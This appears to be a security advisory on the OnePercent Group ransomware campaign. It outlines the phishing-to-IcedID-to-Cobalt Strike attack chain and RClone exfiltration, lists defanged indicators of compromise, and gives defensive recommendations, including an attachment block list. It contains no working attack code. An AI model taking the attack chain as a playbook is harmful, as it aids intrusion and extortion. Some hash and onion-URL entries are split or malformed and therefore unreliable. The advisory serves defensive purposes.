Ransomware attack 2021: Activities related to OnePercent Group Ransomware attacking enterprises through IceID banking Trojan.
It has been reported that a ransomware operator dubbed as OnePercent group has been attacking enterprise networks using the Cobalt Strike post-exploit toolkit and remote PowerShell commands.
The group primarily relies on the following tactics for its attacks:
1. Phishing email campaigns to deliver malicious attachments that carry malicious zip file. The zip file consists of Microsoft Office documents including Word or Excel document containing malicious macros.
2. Once the documents are opened by the victim, the attachment’s macros infect the system with the IcedID banking trojan.IcedID malware downloads additional software to deploy additional payloads on infected networks.
3. The malware is then used to install and execute the Cobalt Strike penetration testing framework on the compromised network, which moves laterally across a victim’s network using PowerShell. (Primarily with PowerShell remoting.)
4. OnePercent Group actors encrypt the data and exfiltrate it from the victim’s servers using RClone to exfiltrate sensitive data.
5. Once the ransomware is successfully deployed, the actors contact the victims via spoofed phone numbers with ransom demands and provides a ProtonMail email address for further communication, threatening to release the stolen data on Darkweband/or open Intenet,unless a ransom is paid in virtual currency.
6. OnePercent Group actors’ extortion tactics begin with a warning and progress from a partial leak of data to a full leak of all the victim’s exfiltrated data.
File Names and Tools used by Attackers
The OnePercent threat actors leverages following tools to compromise victims company’s enterprise network:
1. AWS S3 cloud
2. IcedID
3. Cobalt Strike
4. Powershell
5. Rclone
6. Mimikatz
7. SharpKatz
8. BetterSafetyKatz
9. SharpSploit
Indicators of Compromise (IoCs):
1. File Extension of Encrypted Files:
The OnePercent group encrypts files and appends to their filenames a random eight-character extension (e.g., dZCqciA) and adds ransom notes that include reference to the .onion website operated by the threat actors.
2. IPs and Domains:
- 157.245.239[.]187
- 31.187.64[.]199
- 206.189.227[.]145
- 167.71.224[.]39
- 80.82.67[.]221
- 138.197.179[.]153
- 134.209.203[.]30
- nix1[.]xyz
- golddisco[.]top
- delokijio[.]pw
- june85[.]cyou
- intensemisha[.]cyou
- biggarderoub[.]cyou
- d30qpb9e10re4o[.]cloudfront.net
3. Hashes:
- ECA9FAC6848545FF9386176773810F96323FEFF0D575C4B6E1C55F 8DB842E7FE
- C00CFB456FC6AF0376FBEA877B742594C443DF97
- E70ED531C8A12E7ECCE83223D7B9AA1895110DC140EDF85AFC31C 8C5CD580116
- A1D985E13C07EDDFA2721B14F7C9F869B0D733C9
4. TOR URLs and Email address:
hXXp://5mvifa3xq5m7sou3xzaajfz7h6eserp5fnkwotohns5pgbb5oxty3zad.onion
hXXp://5mvifa3xq5m7sou3xzaajfz7h6eserp5fnkwotohns5pgbb5oxty 3zad. onion
1percentransom@protonmail.com
5. Observed Malware Filename & Paths:
%TEMP%\Temp1_request.zip\[FILENAME].doc
%PROGRAMDATA%\vexby.txt
6. BTC Address: bc1qds0yly3fn608gtm332gag029munvlute2wxktn
Recommendations: Following are some steps which can be taken to prevent further such Infections:
1. Perform regular backups of all critical information to limit the Impact of data or system loss and to help expedite the recovery process. Ideally, this data should be kept on a separate device, and backups should be stored offline.
2. Keep the operating system third party applications (MS Office, browsers, browser Plugins) up-to-date with the latest patches.
3. Maintain updated Antivirus software on all systems.
4. Don’t open attachments in unsolicited emails, even if they come from people in your contact list, and never click on a URL contained in an unsolicited e-mail, even if the link seems benign. In cases of genuine URLs, close out the email and go to the organization’s website directly through the browser.
5. To address malicious activity initiated through weaponized Office documents, use rules that block advanced macro activity, executable content, process creation, and process injection initiated by Office applications [To assess the impact of these rules, deploy them in audit mode.] Turn on AMSI for Office VBA on Office 365.
6. Consider implementing Microsoft Local Administrator Password Solution (LAPS), for Windows Active Directory environments.
7. Ensure administrators are not using “Admin Approval” mode.
8. Must Back-up critical data offline.
9. Use multi-factor authentication with strong passphrases.
10. Do not enable Macros if prompted by documents received from untrusted sources.
11. Physical Block and locks USB Ports & Ethernet Ports from local cyber threats.
Best Practices and Recommendations to protect users against the threat of Ransomware:
1. Update software and operating systems with the latest patches. Outdated applications and operating systems are the targets of most attacks.
2. Scan all incoming and outgoing emails to detect threats and filter executable files from reaching end users.
3. Network segmentation and segregation into security zones – help protect sensitive information and critical services. Separate administrative network from business processes with physical controls and Virtual Local Area Networks.
4. Restrict users’ permissions to install and run software applications, and apply the principle of “least privilege” to all systems and services. Restricting these privileges may prevent malware from running or limit its capability to spread through a network.
5. Configure firewalls to block access to known malicious IP addresses. 6Disable their RDP if not in use, if required it should be placed behind the firewall and users are to bind with proper policies while using the RDP.
6. Restrict execution of Power shell /WSCRIPT in enterprise environment Ensure installation and use of the latest version of PowerShell, with enhanced logging enabled. Script block logging and transcription enabled. Send the associated logs to a centralized log repository for monitoring and analysis.
7. Establish a Sender Policy Framework (SPF) for your domain, which is an email validation system designed to prevent spam by detecting email spoofing by which most of the ransomware samples successfully reach the corporate email boxes.
8. Application whitelisting/Strict implementation of Software Restriction Policies (SRP) to block binaries running from %APPDATA% and %TEMP% paths. Ransomware sample drops and executes generally from these locations.
9. Don’t open attachments in unsolicited emails, even if they come from people in your contact list, and never click on a URL contained in an unsolicited e-mail, even if the link seems benign. In cases of genuine URLs close out the email and go to the organization’s website directly through browser .
10. Block the attachments of file types, exe|pif|tmp|url|vb|vbe|scr|reg|cer|pst|cmd|com|bat|dll|dat|hlp|hta|js|wsf. Consider encrypting the confidential data as the ransomware generally targets common file types.
11. Carry out vulnerability Assessment and Penetration Testing (VAPT) and information security audit of critical networks/systems, especially database servers. Repeat audits at regular intervals.
12. Perform regular backups of all critical information to limit the impact of data or system loss and to help expedite the recovery process. Ideally, this data should be kept on a separate device, and backups should be stored offline.
13. Implement measures to control use of VBA/macros in office documents, control permissible attachment types in email systems.
References
https://www.ic3.gov/Media/News/2021/210823.pdf
https://www.cert-in.org.in/s2cMainServlet?pageid=PUBADV01&CACODE=CICA-2021-2969 3/3
https://www.securityweek.com/fbi-shares-details-onepercent-group-ransomware-operators
https://www.cyberswachhtakendra.gov.in/alerts/ransomware.html
Disclaimer
The information provided herein is on “as is” basis, without warranty of any kind.